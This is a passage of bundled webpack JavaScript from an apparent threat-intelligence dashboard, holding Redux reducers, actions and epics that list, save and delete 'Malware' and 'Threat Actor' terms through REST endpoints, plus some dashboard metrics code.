  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : Object(__WEBPACK_IMPORTED_MODULE_3__types_js__["b" /* Options */])();
  var action = arguments[1];
  var type = action.type,
      payload = action.payload;


  switch (type) {
    case __WEBPACK_IMPORTED_MODULE_2__action_types_js__["b" /* SET_DISPLAY_OPTIONS */]:
      return state.merge(payload);
    default:
      return state;
  }
};

var loading = function loading() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : true;
  var action = arguments[1];

  return false;
};

/* harmony default export */ __webpack_exports__["a"] = (Object(__WEBPACK_IMPORTED_MODULE_0_redux_immutable__["combineReducers"])({
  options: options,
  loading: loading
}));

/***/ }),
/* 2944 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_rxjs__ = __webpack_require__(14);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_rxjs___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_rxjs__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_redux_observable__ = __webpack_require__(15);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_debug__ = __webpack_require__(7);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_debug___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_2_debug__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__tracking_constants_js__ = __webpack_require__(1322);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4__action_types_js__ = __webpack_require__(506);




var debug = __WEBPACK_IMPORTED_MODULE_2_debug___default()('app:modules:marketplace:epics'); // eslint-disable-line no-unused-vars





/* harmony default export */ __webpack_exports__["a"] = (Object(__WEBPACK_IMPORTED_MODULE_1_redux_observable__["combineEpics"])());

/***/ }),
/* 2945 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "fetchAllMalware", function() { return fetchAllMalware; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "saveMalware", function() { return saveMalware; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "deleteMalware", function() { return deleteMalware; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "updateFilters", function() { return updateFilters; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "resetFilters", function() { return resetFilters; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__action_types_js__ = __webpack_require__(723);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__types__ = __webpack_require__(724);




/* Fetches all Malware terms */
var fetchAllMalware = function fetchAllMalware() {
  return { type: __WEBPACK_IMPORTED_MODULE_0__action_types_js__["d" /* FETCH_MALWARE */] };
};

/* Handles save new term and edit term */
var saveMalware = function saveMalware(malware) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_0__action_types_js__["h" /* SAVE_MALWARE */],
    payload: malware
  };
};

/* Delete by guid */
var deleteMalware = function deleteMalware(malware) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_0__action_types_js__["a" /* DELETE_MALWARE */],
    payload: malware
  };
};

var updateFilters = function updateFilters(payload, field) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_0__action_types_js__["k" /* UPDATE_PAGE_FILTERS */],
    payload: payload,
    field: field
  };
};

var resetFilters = function resetFilters() {
  return { type: __WEBPACK_IMPORTED_MODULE_0__action_types_js__["g" /* RESET_PAGE_FILTERS */] };
};

/***/ }),
/* 2946 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* unused harmony export terms */
/* unused harmony export loading */
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_redux_immutable__ = __webpack_require__(20);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_redux_immutable___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_redux_immutable__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_immutable__ = __webpack_require__(1);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__getters__ = __webpack_require__(573);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__action_types_js__ = __webpack_require__(723);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4__types__ = __webpack_require__(724);








var terms = function terms() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["OrderedMap"])();
  var action = arguments[1];
  var type = action.type,
      payload = action.payload;


  switch (type) {
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["f" /* FETCH_MALWARE_SUCCESS */]:
      var items = Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["fromJS"])(payload.get('items')).toOrderedMap().mapKeys(function (k, v) {
        return v.get('guid');
      });
      return Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["fromJS"])(payload).set('items', items);
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["j" /* SAVE_MALWARE_SUCCESS */]:
      return state.setIn(['items', payload.get('guid')], payload);
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["c" /* DELETE_MALWARE_SUCCESS */]:
      return state.deleteIn(['items', payload.guid]);
    default:
      return state;
  }
};

var loading = function loading() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : false;
  var action = arguments[1];

  switch (action.type) {
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["d" /* FETCH_MALWARE */]:
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["h" /* SAVE_MALWARE */]:
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["a" /* DELETE_MALWARE */]:
      return true;
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["f" /* FETCH_MALWARE_SUCCESS */]:
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["e" /* FETCH_MALWARE_FAILURE */]:
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["j" /* SAVE_MALWARE_SUCCESS */]:
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["i" /* SAVE_MALWARE_FAILURE */]:
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["c" /* DELETE_MALWARE_SUCCESS */]:
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["b" /* DELETE_MALWARE_FAILURE */]:
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["k" /* UPDATE_PAGE_FILTERS */]:
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["g" /* RESET_PAGE_FILTERS */]:
      return false;
    default:
      return state;
  }
};

var currentQuery = function currentQuery() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : __WEBPACK_IMPORTED_MODULE_2__getters__["defaultPayload"];
  var action = arguments[1];
  var type = action.type,
      payload = action.payload,
      field = action.field;


  switch (type) {
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["k" /* UPDATE_PAGE_FILTERS */]:
      if (!field) {
        // Error message for now until better solution
        console.error('Error updating filter, missing field name or \'all\'');
        return state;
      }

      if (field && field.includes('.')) {
        // Nested fields separated by .
        var updatePath = field.split('.');
        return state.setIn(updatePath, payload);
      }
      if (field && field === 'query') {
        state = state.set('pageNumber', 0);
      }
      return state.set(field, payload.get(field));
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["g" /* RESET_PAGE_FILTERS */]:
      return __WEBPACK_IMPORTED_MODULE_2__getters__["defaultPayload"];
    default:
      return state;
  }
};

/* harmony default export */ __webpack_exports__["a"] = (Object(__WEBPACK_IMPORTED_MODULE_0_redux_immutable__["combineReducers"])({
  terms: terms,
  loading: loading,
  currentQuery: currentQuery
}));

/***/ }),
/* 2947 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_rxjs__ = __webpack_require__(14);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_rxjs___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_rxjs__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_ramda__ = __webpack_require__(8);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_ramda___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_1_ramda__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_immutable__ = __webpack_require__(1);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_querystring__ = __webpack_require__(119);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_querystring___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_3_querystring__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_redux_observable__ = __webpack_require__(15);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5_react_router_redux__ = __webpack_require__(100);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5_react_router_redux___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_5_react_router_redux__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_6__constants__ = __webpack_require__(1323);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_7__action_types__ = __webpack_require__(723);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_8__getters_js__ = __webpack_require__(573);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_9_modules_alerts_actions__ = __webpack_require__(76);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_10__utils__ = __webpack_require__(1324);













var formatSearchRequest = function formatSearchRequest(payload) {
  var sort = payload.getIn(['sort', 'sort'], {});
  var params = {
    'query': payload.get('query', ''),
    'sort': sort.sortBy + ',' + sort.sortDirection,
    'pageNumber': payload.get('pageNumber'),
    'pageSize': payload.get('pageSize')
  };
  return Object(__WEBPACK_IMPORTED_MODULE_3_querystring__["stringify"])(params);
};

var viewLoadedEpic = function viewLoadedEpic(action$) {
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_5_react_router_redux__["LOCATION_CHANGE"]).map(Object(__WEBPACK_IMPORTED_MODULE_1_ramda__["prop"])('payload')).filter(function (x) {
    return x.pathname === '/settings/malware';
  }).mergeMap(function () {
    return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].from([{ type: __WEBPACK_IMPORTED_MODULE_7__action_types__["d" /* FETCH_MALWARE */] }]);
  });
};

/* Fetches all Malware terms and aliases */
var fetchMalwareEpic = function fetchMalwareEpic(action$, store, _ref) {
  var ajax = _ref.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_7__action_types__["d" /* FETCH_MALWARE */], __WEBPACK_IMPORTED_MODULE_7__action_types__["k" /* UPDATE_PAGE_FILTERS */], __WEBPACK_IMPORTED_MODULE_7__action_types__["g" /* RESET_PAGE_FILTERS */]).mergeMap(function () {
    var currentQuery = __WEBPACK_IMPORTED_MODULE_8__getters_js__["currentQuery"](store.getState());
    return ajax.get(__WEBPACK_IMPORTED_MODULE_6__constants__["MALWARE_ENDPOINT"] + '?' + formatSearchRequest(currentQuery)).map(Object(__WEBPACK_IMPORTED_MODULE_1_ramda__["prop"])('response')).map(function (response) {
      return {
        type: __WEBPACK_IMPORTED_MODULE_7__action_types__["f" /* FETCH_MALWARE_SUCCESS */],
        payload: Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["Map"])(response)
      };
    }).catch(function (err) {
      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].of({ type: __WEBPACK_IMPORTED_MODULE_7__action_types__["e" /* FETCH_MALWARE_FAILURE */] });
    });
  });
};

/* Adds a new Malware term and aliases */
var saveMalwareEpic = function saveMalwareEpic(action$, store, _ref2) {
  var ajax = _ref2.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_7__action_types__["h" /* SAVE_MALWARE */]).mergeMap(function (_ref3) {
    var payload = _ref3.payload;

    var saveType = payload.get('guid') ? 'updated' : 'saved';
    var successMessage = 'The Malware term ' + payload.get('name') + ' was ' + saveType + ' successfully.';
    return ajax.postJSON(__WEBPACK_IMPORTED_MODULE_6__constants__["MALWARE_ENDPOINT"], payload.toJS()).map(Object(__WEBPACK_IMPORTED_MODULE_1_ramda__["prop"])('response')).map(function (malware) {
      return {
        type: __WEBPACK_IMPORTED_MODULE_7__action_types__["j" /* SAVE_MALWARE_SUCCESS */],
        payload: Object(__WEBPACK_IMPORTED_MODULE_10__utils__["normalizeMalware"])(Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["fromJS"])(malware)),
        meta: {
          alert: { type: 'success', text: successMessage }
        }
      };
    }).catch(function (err) {
      var serverError = Object(__WEBPACK_IMPORTED_MODULE_1_ramda__["path"])(['xhr', 'response', 'message'], err);
      var message = serverError ? serverError : 'There was an error adding the Malware term.';
      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].from([{ type: __WEBPACK_IMPORTED_MODULE_7__action_types__["i" /* SAVE_MALWARE_FAILURE */] }, Object(__WEBPACK_IMPORTED_MODULE_9_modules_alerts_actions__["error"])(message)]);
    });
  });
};

/* Removes a Malware Term */
var deleteMalwareEpic = function deleteMalwareEpic(action$, store, _ref4) {
  var ajax = _ref4.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_7__action_types__["a" /* DELETE_MALWARE */]).mergeMap(function (_ref5) {
    var payload = _ref5.payload;

    var guid = payload.get('guid');
    var name = payload.get('name');
    return ajax.delete(__WEBPACK_IMPORTED_MODULE_6__constants__["MALWARE_ENDPOINT"] + '/' + guid).map(function () {
      return {
        type: __WEBPACK_IMPORTED_MODULE_7__action_types__["c" /* DELETE_MALWARE_SUCCESS */],
        payload: { guid: guid },
        meta: {
          alert: { type: 'success', text: 'The Malware term ' + name + ' was deleted successfully.' }
        }
      };
    }).catch(function (err) {
      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].from([{ type: __WEBPACK_IMPORTED_MODULE_7__action_types__["b" /* DELETE_MALWARE_FAILURE */] }, Object(__WEBPACK_IMPORTED_MODULE_9_modules_alerts_actions__["error"])('There was an error removing the Malware term ' + name + '.')]);
    });
  });
};

/* harmony default export */ __webpack_exports__["a"] = (Object(__WEBPACK_IMPORTED_MODULE_4_redux_observable__["combineEpics"])(viewLoadedEpic, fetchMalwareEpic, saveMalwareEpic, deleteMalwareEpic));

/***/ }),
/* 2948 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "fetchAllThreatActors", function() { return fetchAllThreatActors; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "saveThreatActor", function() { return saveThreatActor; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "deleteThreatActor", function() { return deleteThreatActor; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "updateFilters", function() { return updateFilters; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "resetFilters", function() { return resetFilters; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__action_types_js__ = __webpack_require__(725);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__types__ = __webpack_require__(726);




/* Fetches all Threat Actor terms */
var fetchAllThreatActors = function fetchAllThreatActors() {
  return { type: __WEBPACK_IMPORTED_MODULE_0__action_types_js__["d" /* FETCH_THREAT_ACTOR */] };
};

/* Handles save new term and edit term */
var saveThreatActor = function saveThreatActor(threatActor) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_0__action_types_js__["h" /* SAVE_THREAT_ACTOR */],
    payload: threatActor
  };
};

/* Delete by guid */
var deleteThreatActor = function deleteThreatActor(threatActor) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_0__action_types_js__["a" /* DELETE_THREAT_ACTOR */],
    payload: threatActor
  };
};

var updateFilters = function updateFilters(payload, field) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_0__action_types_js__["k" /* UPDATE_PAGE_FILTERS */],
    payload: payload,
    field: field
  };
};

var resetFilters = function resetFilters() {
  return { type: __WEBPACK_IMPORTED_MODULE_0__action_types_js__["g" /* RESET_PAGE_FILTERS */] };
};

/***/ }),
/* 2949 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* unused harmony export terms */
/* unused harmony export loading */
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_redux_immutable__ = __webpack_require__(20);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_redux_immutable___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_redux_immutable__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_immutable__ = __webpack_require__(1);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__getters__ = __webpack_require__(574);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__action_types_js__ = __webpack_require__(725);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4__types__ = __webpack_require__(726);








var terms = function terms() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["OrderedMap"])();
  var action = arguments[1];
  var type = action.type,
      payload = action.payload;


  switch (type) {
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["f" /* FETCH_THREAT_ACTOR_SUCCESS */]:
      var items = Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["fromJS"])(payload.get('items')).toOrderedMap().mapKeys(function (k, v) {
        return v.get('guid');
      });
      return Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["fromJS"])(payload).set('items', items);
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["j" /* SAVE_THREAT_ACTOR_SUCCESS */]:
      return state.setIn(['items', payload.get('guid')], payload);
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["c" /* DELETE_THREAT_ACTOR_SUCCESS */]:
      return state.deleteIn(['items', payload.guid]);
    default:
      return state;
  }
};

var loading = function loading() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : false;
  var action = arguments[1];

  switch (action.type) {
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["d" /* FETCH_THREAT_ACTOR */]:
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["h" /* SAVE_THREAT_ACTOR */]:
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["a" /* DELETE_THREAT_ACTOR */]:
      return true;
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["f" /* FETCH_THREAT_ACTOR_SUCCESS */]:
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["e" /* FETCH_THREAT_ACTOR_FAILURE */]:
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["j" /* SAVE_THREAT_ACTOR_SUCCESS */]:
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["i" /* SAVE_THREAT_ACTOR_FAILURE */]:
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["c" /* DELETE_THREAT_ACTOR_SUCCESS */]:
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["b" /* DELETE_THREAT_ACTOR_FAILURE */]:
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["k" /* UPDATE_PAGE_FILTERS */]:
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["g" /* RESET_PAGE_FILTERS */]:
      return false;
    default:
      return state;
  }
};

var currentQuery = function currentQuery() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : __WEBPACK_IMPORTED_MODULE_2__getters__["defaultPayload"];
  var action = arguments[1];
  var type = action.type,
      payload = action.payload,
      field = action.field;


  switch (type) {
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["k" /* UPDATE_PAGE_FILTERS */]:
      if (!field) {
        // Error message for now until better solution
        console.error('Error updating filter, missing field name or \'all\'');
        return state;
      }

      if (field && field.includes('.')) {
        // Nested fields separated by .
        var updatePath = field.split('.');
        return state.setIn(updatePath, payload);
      }
      if (field && field === 'query') {
        state = state.set('pageNumber', 0);
      }
      return state.set(field, payload.get(field));
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["g" /* RESET_PAGE_FILTERS */]:
      return __WEBPACK_IMPORTED_MODULE_2__getters__["defaultPayload"];
    default:
      return state;
  }
};

/* harmony default export */ __webpack_exports__["a"] = (Object(__WEBPACK_IMPORTED_MODULE_0_redux_immutable__["combineReducers"])({
  terms: terms,
  loading: loading,
  currentQuery: currentQuery
}));

/***/ }),
/* 2950 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_rxjs__ = __webpack_require__(14);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_rxjs___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_rxjs__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_ramda__ = __webpack_require__(8);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_ramda___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_1_ramda__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_immutable__ = __webpack_require__(1);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_querystring__ = __webpack_require__(119);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_querystring___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_3_querystring__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_redux_observable__ = __webpack_require__(15);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5_react_router_redux__ = __webpack_require__(100);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5_react_router_redux___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_5_react_router_redux__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_6__constants__ = __webpack_require__(1325);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_7__action_types__ = __webpack_require__(725);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_8__getters_js__ = __webpack_require__(574);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_9_modules_alerts_actions__ = __webpack_require__(76);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_10__utils__ = __webpack_require__(1326);













var formatSearchRequest = function formatSearchRequest(payload) {
  var sort = payload.getIn(['sort', 'sort'], {});
  var params = {
    'query': payload.get('query', ''),
    'sort': sort.sortBy + ',' + sort.sortDirection,
    'pageNumber': payload.get('pageNumber'),
    'pageSize': payload.get('pageSize')
  };
  return Object(__WEBPACK_IMPORTED_MODULE_3_querystring__["stringify"])(params);
};

var viewLoadedEpic = function viewLoadedEpic(action$) {
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_5_react_router_redux__["LOCATION_CHANGE"]).map(Object(__WEBPACK_IMPORTED_MODULE_1_ramda__["prop"])('payload')).filter(function (x) {
    return x.pathname === '/settings/threat-actors';
  }).mergeMap(function () {
    return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].from([{ type: __WEBPACK_IMPORTED_MODULE_7__action_types__["d" /* FETCH_THREAT_ACTOR */] }]);
  });
};

/* Fetches all Threat Actor terms and aliases */
var fetchThreatActorEpic = function fetchThreatActorEpic(action$, store, _ref) {
  var ajax = _ref.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_7__action_types__["d" /* FETCH_THREAT_ACTOR */], __WEBPACK_IMPORTED_MODULE_7__action_types__["k" /* UPDATE_PAGE_FILTERS */], __WEBPACK_IMPORTED_MODULE_7__action_types__["g" /* RESET_PAGE_FILTERS */]).mergeMap(function () {
    var currentQuery = __WEBPACK_IMPORTED_MODULE_8__getters_js__["currentQuery"](store.getState());
    return ajax.get(__WEBPACK_IMPORTED_MODULE_6__constants__["THREAT_ACTOR_ENDPOINT"] + '?' + formatSearchRequest(currentQuery)).map(Object(__WEBPACK_IMPORTED_MODULE_1_ramda__["prop"])('response')).map(function (response) {
      return {
        type: __WEBPACK_IMPORTED_MODULE_7__action_types__["f" /* FETCH_THREAT_ACTOR_SUCCESS */],
        payload: Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["Map"])(response)
      };
    }).catch(function (err) {
      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].of({ type: __WEBPACK_IMPORTED_MODULE_7__action_types__["e" /* FETCH_THREAT_ACTOR_FAILURE */] });
    });
  });
};

/* Adds a new Threat Actor term and aliases */
var saveThreatActorEpic = function saveThreatActorEpic(action$, store, _ref2) {
  var ajax = _ref2.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_7__action_types__["h" /* SAVE_THREAT_ACTOR */]).mergeMap(function (_ref3) {
    var payload = _ref3.payload;

    var guid = payload.get('guid');
    var name = payload.get('name');
    var saveType = guid ? 'updated' : 'saved';
    var successMessage = 'The Threat Actor term ' + name + ' was ' + saveType + ' successfully.';
    return ajax.postJSON(__WEBPACK_IMPORTED_MODULE_6__constants__["THREAT_ACTOR_ENDPOINT"], payload.toJS()).map(Object(__WEBPACK_IMPORTED_MODULE_1_ramda__["prop"])('response')).map(function (threatActor) {
      return {
        type: __WEBPACK_IMPORTED_MODULE_7__action_types__["j" /* SAVE_THREAT_ACTOR_SUCCESS */],
        payload: Object(__WEBPACK_IMPORTED_MODULE_10__utils__["normalizeThreatActor"])(Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["fromJS"])(threatActor)),
        meta: {
          alert: { type: 'success', text: successMessage }
        }
      };
    }).catch(function (err) {
      var serverError = Object(__WEBPACK_IMPORTED_MODULE_1_ramda__["path"])(['xhr', 'response', 'message'], err);
      var message = serverError ? serverError : 'There was an error adding the Threat Actor term.';
      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].from([{ type: __WEBPACK_IMPORTED_MODULE_7__action_types__["i" /* SAVE_THREAT_ACTOR_FAILURE */] }, Object(__WEBPACK_IMPORTED_MODULE_9_modules_alerts_actions__["error"])(message)]);
    });
  });
};

/* Removes a Threat Actor Term */
var deleteThreatActorEpic = function deleteThreatActorEpic(action$, store, _ref4) {
  var ajax = _ref4.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_7__action_types__["a" /* DELETE_THREAT_ACTOR */]).mergeMap(function (_ref5) {
    var payload = _ref5.payload;

    var guid = payload.get('guid');
    var name = payload.get('name');

    return ajax.delete(__WEBPACK_IMPORTED_MODULE_6__constants__["THREAT_ACTOR_ENDPOINT"] + '/' + guid).map(function () {
      return {
        type: __WEBPACK_IMPORTED_MODULE_7__action_types__["c" /* DELETE_THREAT_ACTOR_SUCCESS */],
        payload: { guid: guid },
        meta: {
          alert: { type: 'success', text: 'The Threat Actor term ' + name + ' was deleted successfully.' }
        }
      };
    }).catch(function (err) {
      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].from([{ type: __WEBPACK_IMPORTED_MODULE_7__action_types__["b" /* DELETE_THREAT_ACTOR_FAILURE */] }, Object(__WEBPACK_IMPORTED_MODULE_9_modules_alerts_actions__["error"])('There was an error removing the Threat Actor term ' + name + '.')]);
    });
  });
};

/* harmony default export */ __webpack_exports__["a"] = (Object(__WEBPACK_IMPORTED_MODULE_4_redux_observable__["combineEpics"])(viewLoadedEpic, fetchThreatActorEpic, saveThreatActorEpic, deleteThreatActorEpic));

/***/ }),
/* 2951 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "init", function() { return init; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__action_types__ = __webpack_require__(505);


var init = function init() {
  return { type: __WEBPACK_IMPORTED_MODULE_0__action_types__["d" /* INIT */] };
};

/***/ }),
/* 2952 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "data", function() { return data; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "meta", function() { return meta; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "loading", function() { return loading; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_trustar_utils__ = __webpack_require__(5);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_immutable__ = __webpack_require__(1);



var data = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['metrics', 'data']);
var meta = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['metrics', 'meta']);
var loading = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['metrics', 'meta', 'loading']);

/***/ }),
/* 2953 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_immutable__ = __webpack_require__(1);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_redux_immutable__ = __webpack_require__(20);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_redux_immutable___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_1_redux_immutable__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_trustar_utils_dashboard_js__ = __webpack_require__(500);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__action_types_js__ = __webpack_require__(505);







var defaultMeta = Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["fromJS"])({
  loading: true,
  category: null,
  dateSince: null,
  dateUntil: null,
  dateRange: 'Displaying past 30 days',
  showCustom: false
});

var meta = function meta() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : defaultMeta;
